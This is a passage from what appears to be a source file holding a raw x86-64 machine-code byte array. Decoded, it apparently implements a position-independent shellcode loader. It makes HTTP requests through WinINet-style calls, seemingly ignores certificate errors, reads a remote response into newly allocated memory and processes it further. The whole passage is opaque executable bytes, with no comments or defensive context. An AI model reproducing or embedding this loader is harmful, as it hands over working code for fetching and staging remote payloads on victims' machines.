467 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b,
468 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31,
469 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20,
470 0x48, 0x8b, 0x55, 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89,
471 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x72, 0xfb, 0xff, 0xff, 0x48, 0x89,
472 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45,
473 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0,
474 0x74, 0x07, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45,
475 0xf0, 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x56, 0x53, 0x48, 0x81,
476 0xec, 0xd0, 0x03, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00,
477 0x00, 0x48, 0x89, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x48,
478 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x02, 0x00,
479 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x44, 0x03, 0x00, 0x00, 0x00,
480 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00,
481 0x00, 0xc7, 0x85, 0x38, 0x03, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x48,
482 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00,
483 0x00, 0x48, 0x89, 0x85, 0x30, 0x03, 0x00, 0x00, 0xc7, 0x85, 0x40, 0x03,
484 0x00, 0x00, 0x00, 0x03, 0x60, 0x04, 0x48, 0x8d, 0x85, 0x70, 0x02, 0x00,
485 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
486 0x48, 0x89, 0xc1, 0xe8, 0xd8, 0x4d, 0x00, 0x00, 0xc7, 0x85, 0x70, 0x02,
487 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x01, 0x00,
488 0x00, 0x48, 0x89, 0x85, 0x88, 0x02, 0x00, 0x00, 0xc7, 0x85, 0x90, 0x02,
489 0x00, 0x00, 0x04, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x50, 0x48, 0x89,
490 0x85, 0xb8, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x04,
491 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x48, 0x89, 0x85, 0x98, 0x02,
492 0x00, 0x00, 0xc7, 0x85, 0xa0, 0x02, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
493 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x02, 0x00, 0x00, 0xc7,
494 0x85, 0xb0, 0x02, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
495 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0x48,
496 0x8b, 0x95, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0xf8, 0x08, 0x00,
497 0x00, 0x48, 0x8d, 0x95, 0x70, 0x02, 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41,
498 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
499 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x89, 0x07,
500 0x00, 0x00, 0x8b, 0x85, 0x84, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f,
501 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x3c, 0x03, 0x00, 0x00, 0x83,
502 0xbd, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x74, 0x1d, 0x81, 0x8d, 0x40, 0x03,
503 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x83, 0xbd, 0x38, 0x03, 0x00, 0x00,
504 0x00, 0x74, 0x0a, 0x81, 0x8d, 0x40, 0x03, 0x00, 0x00, 0x00, 0x30, 0x00,
505 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28,
506 0x01, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
507 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba,
508 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
509 0x89, 0x85, 0x28, 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x28, 0x03, 0x00,
510 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x05, 0x07,
511 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90,
512 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x85, 0x94, 0x02, 0x00, 0x00, 0x0f,
513 0xb7, 0xc8, 0x48, 0x8d, 0x95, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
514 0x28, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00,
515 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
516 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
517 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48,
518 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x48, 0x89, 0x85, 0x20, 0x03, 0x00, 0x00,
519 0x48, 0x83, 0xbd, 0x20, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xba, 0x05,
520 0x00, 0x00, 0x8b, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x08,
521 0xc6, 0x45, 0x50, 0x2f, 0xc6, 0x45, 0x51, 0x00, 0x48, 0x8b, 0x85, 0x70,
522 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x58, 0x01, 0x00, 0x00, 0x48, 0x8d,
523 0x4d, 0x50, 0x48, 0x8b, 0x85, 0x20, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44,
524 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x40, 0x03, 0x00, 0x00,
525 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
526 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9,
527 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
528 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x48, 0x89, 0x85, 0x18, 0x03, 0x00,
529 0x00, 0x48, 0x83, 0xbd, 0x18, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x27,
530 0x05, 0x00, 0x00, 0x83, 0xbd, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x74, 0x53,
531 0x8b, 0x85, 0x40, 0x03, 0x00, 0x00, 0x25, 0x00, 0x10, 0x00, 0x00, 0x85,
532 0xc0, 0x74, 0x44, 0xc7, 0x85, 0x14, 0x03, 0x00, 0x00, 0x04, 0x00, 0x00,
533 0x00, 0xc7, 0x85, 0xec, 0x02, 0x00, 0x00, 0x80, 0x33, 0x00, 0x00, 0x48,
534 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x38, 0x01, 0x00,
535 0x00, 0x48, 0x8d, 0x95, 0xec, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18,
536 0x03, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0,
537 0xba, 0x1f, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x8b,
538 0x85, 0xa0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x8b, 0x85,
539 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x38, 0x01, 0x00, 0x00, 0x8b,
540 0x8d, 0xa0, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x02, 0x00, 0x00,
541 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x41, 0x89, 0xc9, 0x49, 0x89,
542 0xd0, 0xba, 0x1c, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2,
543 0x89, 0x85, 0x44, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xb0, 0x02, 0x00, 0x00,
544 0x85, 0xc0, 0x74, 0x39, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
545 0x8b, 0x90, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x8d, 0xb0, 0x02, 0x00, 0x00,
546 0x48, 0x8b, 0x95, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03,
547 0x00, 0x00, 0x41, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba, 0x1d, 0x00, 0x00,
548 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x44, 0x03, 0x00,
549 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x60,
550 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0xc7, 0x44,
551 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
552 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
553 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x85, 0xc0, 0x0f, 0x84, 0xe8, 0x02, 0x00,
554 0x00, 0xc7, 0x85, 0xe4, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7,
555 0x85, 0xe0, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
556 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x68, 0x01, 0x00, 0x00, 0x48,
557 0x8d, 0x8d, 0xe4, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xe0, 0x02, 0x00,
558 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24,
559 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba,
560 0x13, 0x00, 0x00, 0x20, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x85, 0xc0,
561 0x0f, 0x84, 0x8f, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe0, 0x02, 0x00, 0x00,
562 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x7e, 0x02, 0x00, 0x00, 0xc7,
563 0x85, 0xe4, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf0,
564 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
565 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8d,
566 0xe4, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x48,
567 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00,
568 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba, 0x05, 0x00,
569 0x00, 0x20, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03,
570 0x00, 0x00, 0x83, 0xbd, 0x10, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x80,
571 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b,
572 0x80, 0xc8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x3d, 0x76, 0x2f, 0x00, 0x00,
573 0x0f, 0x85, 0xff, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xf0, 0x02, 0x00, 0x00,
574 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
575 0x8b, 0x90, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xf4, 0x02, 0x00,
576 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00,
577 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41,
578 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x10, 0x03,
579 0x00, 0x00, 0x00, 0x0f, 0x84, 0xb4, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xf4,
580 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xa6, 0x01, 0x00, 0x00, 0x48,
581 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x75, 0x49, 0x48, 0x8b, 0x85,
582 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xa8, 0x00, 0x00, 0x00, 0x8b,
583 0x85, 0xf4, 0x02, 0x00, 0x00, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03,
584 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x49,
585 0x89, 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3,
586 0x48, 0x89, 0x85, 0x48, 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03,
587 0x00, 0x00, 0x00, 0x75, 0x5f, 0xe9, 0x53, 0x01, 0x00, 0x00, 0x48, 0x8b,
588 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xb0, 0x00, 0x00, 0x00,
589 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xf4, 0x02, 0x00, 0x00,
590 0x01, 0xd0, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48,
591 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x95, 0x48,
592 0x03, 0x00, 0x00, 0x49, 0x89, 0xf1, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00,
593 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x48, 0x89, 0x85, 0x48, 0x03,
594 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84,
595 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
596 0x8b, 0x90, 0x40, 0x01, 0x00, 0x00, 0x8b, 0x8d, 0xf4, 0x02, 0x00, 0x00,
597 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48,
598 0x03, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x4c, 0x8d, 0x85, 0xe8, 0x02, 0x00,
599 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x41,
600 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03,
601 0x00, 0x00, 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xf4, 0x02,
602 0x00, 0x00, 0x01, 0xd0, 0x89, 0x85, 0xf0, 0x02, 0x00, 0x00, 0xe9, 0xa5,
603 0xfe, 0xff, 0xff, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f,
604 0x84, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
605 0x48, 0x8b, 0x98, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00,
606 0x00, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b,
607 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x49, 0x89, 0xf0, 0xba, 0x01,
608 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x48, 0x89, 0x85, 0x48,
609 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x74,
610 0x48, 0xc7, 0x85, 0xe8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
611 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x40, 0x01, 0x00,
612 0x00, 0x8b, 0x8d, 0xf0, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0xe8, 0x02,
613 0x00, 0x00, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85,
614 0x18, 0x03, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x41, 0x89, 0xc8, 0x48, 0x89,
615 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x44, 0x03, 0x00, 0x00, 0xeb, 0x01,
616 0x90, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xf9,
617 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f,
618 0x84, 0xeb, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x89,
619 0xc0, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
620 0x48, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xc8, 0x48, 0x8b,
621 0x95, 0x30, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44,
622 0x24, 0x28, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30,
623 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
624 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xb5, 0x4f,
625 0x00, 0x00, 0x89, 0x85, 0x0c, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x0c, 0x03,
626 0x00, 0x00, 0x00, 0x78, 0x32, 0x8b, 0x8d, 0xf0, 0x02, 0x00, 0x00, 0x48,
627 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00,
628 0x00, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48,
629 0x89, 0xc1, 0xe8, 0x69, 0x47, 0x00, 0x00, 0xc7, 0x85, 0x44, 0x03, 0x00,
630 0x00, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x0a, 0xc7, 0x85, 0x44, 0x03, 0x00,
631 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x48,
632 0x8b, 0x85, 0x48, 0x03, 0x00, 0x00, 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00,
633 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xf2, 0x46, 0x00, 0x00, 0x48, 0x8b,
634 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xc0, 0x00, 0x00, 0x00,
635 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00,
636 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x49,
637 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3,
638 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x48, 0x01,
639 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1,
640 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90,
641 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x20, 0x03, 0x00, 0x00, 0x48,
642 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48,
643 0x8b, 0x90, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x03, 0x00,
644 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x83, 0xbd, 0x44, 0x03, 0x00, 0x00,
645 0x00, 0x0f, 0x84, 0xb2, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
646 0x00, 0x00, 0x8b, 0x80, 0x04, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f,
647 0x85, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
648 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x00, 0x03,
649 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80,
650 0x28, 0x0d, 0x00, 0x00, 0x41, 0x89, 0xc0, 0x48, 0x8b, 0x85, 0x70, 0x03,
651 0x00, 0x00, 0x48, 0x8d, 0x90, 0x18, 0x0d, 0x00, 0x00, 0x48, 0x8b, 0x85,
652 0x70, 0x03, 0x00, 0x00, 0x48, 0x05, 0x08, 0x0d, 0x00, 0x00, 0x48, 0x8b,
653 0x8d, 0x00, 0x03, 0x00, 0x00, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48,
654 0x89, 0xc1, 0xe8, 0x45, 0x53, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
655 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x95, 0x70, 0x03, 0x00,
656 0x00, 0x48, 0x8d, 0x8a, 0x00, 0x0c, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
657 0x05, 0x50, 0x00, 0x00, 0x48, 0x89, 0x85, 0xf8, 0x02, 0x00, 0x00, 0x48,
658 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x05, 0x00,
659 0x00, 0x48, 0x39, 0x85, 0xf8, 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00,
660 0x00, 0x00, 0x00, 0xeb, 0x06, 0x8b, 0x85, 0x44, 0x03, 0x00, 0x00, 0x48,
661 0x81, 0xc4, 0xd0, 0x03, 0x00, 0x00, 0x5b, 0x5e, 0x5d, 0xc3, 0x55, 0x48,
662 0x81, 0xec, 0x70, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00,
663 0x00, 0x00, 0x48, 0x89, 0x8d, 0x00, 0x02, 0x00, 0x00, 0x48, 0x89, 0x95,
664 0x08, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x85, 0x10, 0x02, 0x00, 0x00, 0xc7,
665 0x85, 0xec, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xe4,
666 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02,
667 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0,
668 0x0f, 0x84, 0x7c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
669 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x85, 0x10,
670 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x00, 0x02, 0x00, 0x00, 0x48, 0x81,
671 0xc2, 0x34, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x00, 0x02, 0x00, 0x00,
672 0x48, 0x81, 0xc1, 0x24, 0x08, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xec,
673 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88,
674 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00, 0x00, 0x48,
675 0x83, 0xc0, 0x0c, 0x48, 0x8d, 0x55, 0xb0, 0x49, 0x89, 0xd0, 0x48, 0x89,
676 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x02, 0x00, 0x00, 0xe8, 0xa4, 0xeb, 0xff,
677 0xff, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
678 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x18, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00,
679 0x00, 0x4c, 0x8d, 0x40, 0x08, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00,
680 0x48, 0x8d, 0x88, 0x44, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02,
681 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x55, 0xb0, 0x4d, 0x89, 0xc1,
682 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xec,
683 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88,
684 0x9f, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48,
685 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x50, 0x48, 0x8b,
686 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8d, 0x95,
687 0xbc, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85,
688 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f,
689 0x88, 0x81, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xbc, 0x01, 0x00, 0x00, 0x85,
690 0xc0, 0x74, 0x77, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
691 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x48, 0x48, 0x8b, 0x85,
692 0x10, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x40, 0x10, 0x48, 0x8b, 0x85, 0x00,
693 0x02, 0x00, 0x00, 0x48, 0x8d, 0x88, 0x64, 0x08, 0x00, 0x00, 0x48, 0x8b,
694 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x54, 0x08, 0x00, 0x00,
695 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x4d,
696 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89,
697 0x85, 0xec, 0x01, 0x00, 0x00, 0xeb, 0x1f, 0x48, 0x8b, 0x85, 0x10, 0x02,
